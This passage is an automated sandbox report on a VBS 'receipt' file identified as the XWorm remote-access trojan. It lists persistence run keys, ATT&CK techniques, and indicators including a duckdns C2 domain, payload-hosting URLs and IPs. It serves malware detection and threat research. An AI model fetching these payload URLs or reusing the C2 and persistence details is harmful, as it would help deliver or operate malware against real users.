Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected XWorm

Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3360198407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4980, type: MEMORYSTR

Remote Access Functionality

Yara detected XWorm

Source: Yara match	File source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.3360198407.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 4980, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	331 Scripting	Valid Accounts	1 Exploitation for Client Execution	331 Scripting	1 DLL Side-Loading	1 Disable or Modify Tools	OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	311 Process Injection	2 Obfuscated Files or Information	LSASS Memory	13 System Information Discovery	Remote Desktop Protocol	Data from Removable Media	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	3 PowerShell	1 Office Application Startup	121 Registry Run Keys / Startup Folder	1 Software Packing	Security Account Manager	11 Security Software Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	121 Registry Run Keys / Startup Folder	Login Hook	1 DLL Side-Loading	NTDS	1 Process Discovery	Distributed Component Object Model	Input Capture	1 Non-Standard Port	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	121 Virtualization/Sandbox Evasion	SSH	Keylogging	2 Non-Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	121 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	213 Application Layer Protocol	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
I7336446-receipt.vbs	21%	ReversingLabs	Script-WScript.Trojan.Heuristic
I7336446-receipt.vbs	15%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\RegSvcs.exe	0%	ReversingLabs

Source	Detection	Scanner	Label
http://pesterbdd.com/images/Pester.png	100%	URL Reputation	malware
https://contoso.com/License	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/	0%	URL Reputation	safe
http://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
http://www.microsoft.co	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspx4	0%	Avira URL Cloud	safe
https://www.evolve27.com/nm/xwomay.txt	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspx0	0%	Avira URL Cloud	safe
xwormay8450.duckdns.org	0%	Avira URL Cloud	safe
http://crl.microsoftF	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspxd	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br	0%	Avira URL Cloud	safe
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	0%	Avira URL Cloud	safe
https://pastapohyalbin.com/raw/8RAqVdhv	0%	Avira URL Cloud	safe
http://app01.system.com.br/RDWeb/Pages/login.aspx	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
evolve27.com	131.153.147.50	true	false	unknown
xwormay8450.duckdns.org	12.221.146.138	true	true	unknown
uploaddeimagens.com.br	172.67.215.45	true	true	unknown
pastebin.com	172.67.19.24	true	false	high
www.evolve27.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://www.evolve27.com/nm/xwomay.txt	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/8RAqVdhv	false		high
xwormay8450.duckdns.org	true	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://pastebin.com/raw/8RAqVdhvKos	wscript.exe, 00000000.00000002.2315993674.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://nuget.org/NuGet.exe	powershell.exe, 00000007.00000002.2914568318.0000017BBAA7B000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.microsoftF	powershell.exe, 00000005.00000002.3140393959.000001FD4C510000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://pastebin.com/raw/8RAqVdhvtart	wscript.exe, 00000000.00000003.2313245780.000001EA0E6E1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315425220.000001EA0E6E1000.00000004.00000020.00020000.00000000.sdmp	false		high
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000007.00000002.2563131068.0000017BAAC33000.00000004.00000800.00020000.00000000.sdmp	true	URL Reputation: malware	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000007.00000002.2563131068.0000017BAAC33000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.microsoft.co	powershell.exe, 00000007.00000002.2562563265.0000017BA897F000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000007.00000002.2914568318.0000017BBAA7B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000007.00000002.2914568318.0000017BBAA7B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx4	wscript.exe, 00000000.00000002.2315405942.000001EA0E68E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313245780.000001EA0E68C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://app01.system.com.br/RDWeb/Pages/login.aspx0	wscript.exe, 00000000.00000003.2056432592.000001EA1044F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056418438.000001EA1044B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056196365.000001EA10445000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://aka.ms/pscore6	powershell.exe, 00000005.00000002.3101307570.000001FD34337000.00000004.00000800.00020000.00000000.sdmp	false		high
http://uploaddeimagens.com.br	powershell.exe, 00000007.00000002.2563131068.0000017BB0EFC000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000007.00000002.2563131068.0000017BAAC33000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/l	wscript.exe, 00000000.00000002.2315993674.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspxd	wscript.exe, 00000000.00000003.2314117552.000001EA10470000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2308080003.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056339662.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056132285.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056263648.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312690781.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056226162.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056380505.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056301621.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://uploaddeimagens.com.br	powershell.exe, 00000007.00000002.2563131068.0000017BAAC33000.00000004.00000800.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000007.00000002.2914568318.0000017BBAA7B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000007.00000002.2914568318.0000017BBAA7B000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastebin.com/raw/8RAqVdhvl	wscript.exe, 00000000.00000002.2315993674.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp	false		high
https://aka.ms/pscore68	powershell.exe, 00000005.00000002.3101307570.000001FD3434A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2563131068.0000017BAAA11000.00000004.00000800.00020000.00000000.sdmp	false		high
https://pastapohyalbin.com/raw/8RAqVdhv	wscript.exe, 00000000.00000003.2056301621.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, I7336446-receipt.vbs	false	Avira URL Cloud: safe	unknown
https://pastebin.com/	wscript.exe, 00000000.00000002.2315993674.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312950211.000001EA107F4000.00000004.00000020.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000005.00000002.3101307570.000001FD3437C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2563131068.0000017BAAA11000.00000004.00000800.00020000.00000000.sdmp	false		high
http://app01.system.com.br/RDWeb/Pages/login.aspx	wscript.exe, 00000000.00000003.2314117552.000001EA10470000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2308080003.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313691853.000001EA10442000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315728966.000001EA10440000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056061781.000001EA10450000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056339662.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313719726.000001EA0E63F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313505324.000001EA0E6F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315745147.000001EA10446000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056132285.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056094521.000001EA0E669000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2313761482.000001EA0E65B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2314174582.000001EA0E669000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056263648.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2312690781.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056226162.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2315425220.000001EA0E6F6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056039902.000001EA0E65B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056380505.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2056301621.000001EA1046E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2314734978.000001EA10445000.00000004.00000020.00020000.00000000.sdmp	true	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.19.24	pastebin.com	United States	13335	CLOUDFLARENETUS	false
12.221.146.138	xwormay8450.duckdns.org	United States	7018	ATT-INTERNET4US	true
172.67.215.45	uploaddeimagens.com.br	United States	13335	CLOUDFLARENETUS	true
131.153.147.50	evolve27.com	United States	19437	SS-ASHUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1436276
Start date and time:	2024-05-04 09:47:11 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 37s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	I7336446-receipt.vbs
Detection:	MAL
Classification:	mal100.spre.troj.expl.evad.winVBS@13/13@5/4
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 100% Number of executed functions: 14 Number of non-executed functions: 1
Cookbook Comments:	Found application associated with file extension: .vbs

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 6792 because it is empty
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
09:48:16	API Interceptor	1x Sleep call for process: wscript.exe modified
09:48:35	API Interceptor	47x Sleep call for process: powershell.exe modified
09:48:47	API Interceptor	77789x Sleep call for process: RegSvcs.exe modified
09:48:49	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\moquenqueiro.vbs
09:48:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Path C:\ProgramData\moquenqueiro.vbs
09:49:07	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegSvcs.lnk

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.19.24	Dadebehring PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
172.67.19.24	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	pastebin.com/raw/NsQ5qTHr
12.221.146.138	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse
	171445824977c976fac5440dadfae67b1829817677698fe84127a065ee0d81bdba97dc885f639.dat-decoded.exe	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.vbs	Get hash	malicious	Remcos	Browse
	Hapril-29-receipt.img	Get hash	malicious	XWorm	Browse
	F723838674.vbs	Get hash	malicious	Remcos	Browse
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse
	F873635427.vbs	Get hash	malicious	Remcos, XWorm	Browse
172.67.215.45	youhaveonefilefortody.vbs	Get hash	malicious	AgentTesla	Browse
	getinher.doc	Get hash	malicious	AgentTesla	Browse
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse
	citat-05012024.xla.xlsx	Get hash	malicious	Unknown	Browse
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse
	CARTASCONF_PDF.vbs	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
pastebin.com	ent.exe	Get hash	malicious	XWorm	Browse	172.67.19.24
	BTUJ5A5J3m.exe	Get hash	malicious	LimeRAT	Browse	172.67.19.24
	invoice.exe	Get hash	malicious	MinerDownloader, RedLine, Xmrig	Browse	104.20.4.235
	2024 12_59_31 a.m..js	Get hash	malicious	WSHRAT	Browse	104.20.3.235
	Dadebehring PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	172.67.19.24
	PendingInvoiceBankDetails.JS.js	Get hash	malicious	WSHRAT	Browse	104.20.3.235
	Update on Payment.js	Get hash	malicious	WSHRAT	Browse	104.20.4.235
	G1lnGpOLK4.exe	Get hash	malicious	Njrat	Browse	104.20.3.235
	[V2]launcher.exe	Get hash	malicious	PureLog Stealer, RedLine, Xmrig	Browse	104.20.3.235
	0ED4nPDjeo.exe	Get hash	malicious	RedLine, SectopRAT	Browse	104.20.3.235
uploaddeimagens.com.br	youhaveonefilefortody.vbs	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	getinher.doc	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	citat-05022024.xla.xlsx	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	rE56cXOc25.rtf	Get hash	malicious	AgentTesla	Browse	172.67.215.45
	qneGb3RjUn.rtf	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	INQUIRY#46789.xla.xlsx	Get hash	malicious	Remcos	Browse	172.67.215.45
	nU7Z8sPyvf.rtf	Get hash	malicious	Remcos	Browse	172.67.215.45
	QF3YL9rOxB.rtf	Get hash	malicious	AgentTesla	Browse	104.21.45.138
	citat-05012024.xla.xlsx	Get hash	malicious	Unknown	Browse	172.67.215.45
	Tapril-30-receipt.vbs	Get hash	malicious	Remcos	Browse	172.67.215.45

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ATT-INTERNET4US	sora.arm-20240504-0115.elf	Get hash	malicious	Mirai	Browse	108.218.226.97
	sora.x86-20240504-0115.elf	Get hash	malicious	Mirai	Browse	107.67.131.199
	https://monacolife.net	Get hash	malicious	Unknown	Browse	13.36.27.25
	x86.elf	Get hash	malicious	Unknown	Browse	32.45.187.39
	2AAH1UYstb.elf	Get hash	malicious	Mirai	Browse	99.160.220.147
	9d565bee-e6ce-1842-e729-b0df8f08ed34.eml	Get hash	malicious	HTMLPhisher	Browse	172.183.192.109
	https://icobath.filecloudonline.com/url/axbhz4sjfzebth22?shareto=finance@loans.company.com	Get hash	malicious	Unknown	Browse	13.36.222.91
	aduLTc2Dny.elf	Get hash	malicious	Mirai	Browse	108.250.97.104
	H0RZizYUEv.elf	Get hash	malicious	Mirai	Browse	99.158.139.227
	saq4WWKA5B.elf	Get hash	malicious	Mirai	Browse	69.224.33.94
CLOUDFLARENETUS	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.139.174
	1CMweaqlKp.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.19.24
	SecuriteInfo.com.PossibleThreat.PALLASNET.H.14592.12237.dll	Get hash	malicious	Unknown	Browse	172.67.129.98
	https://securepdffilesaccess%E3%80%82com/docx/#9403ZGF2ZW1AY3BlcXVpdHkuY29t??nEJx==78463=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d#&vg=008d8185-7421-4d39-a8ea-d6571496b99e&stid=14&pti=1&pa=20041&pos=0&p=525094&channelId=21280b5d95ea9121&s=lsfbx0rnvkkgxzgo1sbi4b3z&sgs=2004:15-17+F-150	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://baoku.360.cn/d/2000006826_9510044	Get hash	malicious	Unknown	Browse	1.1.1.1
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	172.67.200.96
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	104.21.13.139
	https://www.bjvpza.cn/	Get hash	malicious	Unknown	Browse	104.22.39.239
	https://broken-rain-1a74.1rwvvy66.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://rdtetsyutfuyfrxytf.azurewebsites.net/	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
CLOUDFLARENETUS	4365078236450.LnK.lnk	Get hash	malicious	Unknown	Browse	172.67.139.174
	1CMweaqlKp.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, RedLine, RisePro Stealer, SmokeLoader	Browse	172.67.19.24
	SecuriteInfo.com.PossibleThreat.PALLASNET.H.14592.12237.dll	Get hash	malicious	Unknown	Browse	172.67.129.98
	https://securepdffilesaccess%E3%80%82com/docx/#9403ZGF2ZW1AY3BlcXVpdHkuY29t??nEJx==78463=/..=L5QpUY&u=276b8dda4ef94158348d5b6b8&id=6b7205781d#&vg=008d8185-7421-4d39-a8ea-d6571496b99e&stid=14&pti=1&pa=20041&pos=0&p=525094&channelId=21280b5d95ea9121&s=lsfbx0rnvkkgxzgo1sbi4b3z&sgs=2004:15-17+F-150	Get hash	malicious	HTMLPhisher	Browse	104.17.2.184
	https://baoku.360.cn/d/2000006826_9510044	Get hash	malicious	Unknown	Browse	1.1.1.1
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	172.67.200.96
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	104.21.13.139
	https://www.bjvpza.cn/	Get hash	malicious	Unknown	Browse	104.22.39.239
	https://broken-rain-1a74.1rwvvy66.workers.dev/	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	https://rdtetsyutfuyfrxytf.azurewebsites.net/	Get hash	malicious	TechSupportScam	Browse	104.17.25.14
SS-ASHUS	https://mandrillapp.com/track/click/30551860/topbusiness.ro?p=eyJzIjoiWmkwVnFVYXdRYlFmYnVnd3Y3OWdtR2h1anpvIiwidiI6MSwicCI6IntcInVcIjozMDU1MTg2MCxcInZcIjoxLFwidXJsXCI6XCJodHRwczpcXFwvXFxcL3RvcGJ1c2luZXNzLnJvXFxcL3dwLWFkbWluXFxcL2pzXFxcL3dpZGdldHNcXFwvbWVkaWFcXFwvP2FjdGlvbj12aWV3JjE0MD1jMk52ZEhRdVpHRm9ibXRsUUd4allYUjBaWEowYjI0dVkyOXQmcjE9MTQwJnIyPTE0MCZub2lzZT00Q0hBUlwiLFwiaWRcIjpcImVjMTY1MjE1OWRhYTRjZTA5ZGZhODE5NTEzNzU2Mjg1XCIsXCJ1cmxfaWRzXCI6W1wiOGMyZTc5NjYyNTU5N2FjNDFlODZkYmM4MWMwMjI2MTFjZjYyYTIzMlwiXX0ifQ	Get hash	malicious	HTMLPhisher	Browse	131.153.170.221
	Remittance. #U0440df.html	Get hash	malicious	HTMLPhisher	Browse	131.153.151.114
	http://loveevamk.life	Get hash	malicious	Unknown	Browse	131.153.131.121
	https://bs-2pp.pages.dev/	Get hash	malicious	HTMLPhisher	Browse	198.24.163.92
	https://infobanknews.com/bank-btpn-tuntaskan-akuisisi-oto-group-senilai-rp655-triliun/	Get hash	malicious	Unknown	Browse	198.24.167.172
	http://midjourney.co	Get hash	malicious	Unknown	Browse	131.153.171.234
	http://zarabidarix.xyz/4kKUDf2271ibnX494fplpivknze26JVIISAKNWCQFBYE13955JAYA338314o10	Get hash	malicious	Unknown	Browse	131.153.151.100
	https://xsetlp3sattty7yhmls.weebly.com/	Get hash	malicious	HTMLPhisher	Browse	131.153.168.132
	https://bafkreiakypngf5p2vusgmzt3htrul7f7hmhpylofrop6cg6waka2djtzz4.ipfs.dweb.link/#katja.lundberg-rand@daiichi-sankyo.eu	Get hash	malicious	Unknown	Browse	131.153.148.27
	https://www.msn.com/en-us/weather/forecast/in-Des-Moines,IA?loc=eyJsIjoiRGVzIE1vaW5lcyIsInIiOiJJQSIsImMiOiJVbml0ZWQgU3RhdGVzIiwiaSI6IlVTIiwidCI6MSwiZyI6ImVuLXVzIiwieCI6Ii05My42MjAzMzg0Mzk5NDE0IiwieSI6IjQxLjU4ODc5MDg5MzU1NDY5In0%3D&weadegreetype=F	Get hash	malicious	Unknown	Browse	131.153.148.26

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	LFfjUMuUFU.exe	Get hash	malicious	AsyncRAT, PureLog Stealer, XWorm	Browse	172.67.215.45 131.153.147.50
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	172.67.215.45 131.153.147.50
	QUOTATION_MAYQTRA031244#U00b7PDF.scr.exe	Get hash	malicious	Unknown	Browse	172.67.215.45 131.153.147.50
	nXaujG6G1F.exe	Get hash	malicious	Blank Grabber, DCRat, Umbral Stealer	Browse	172.67.215.45 131.153.147.50
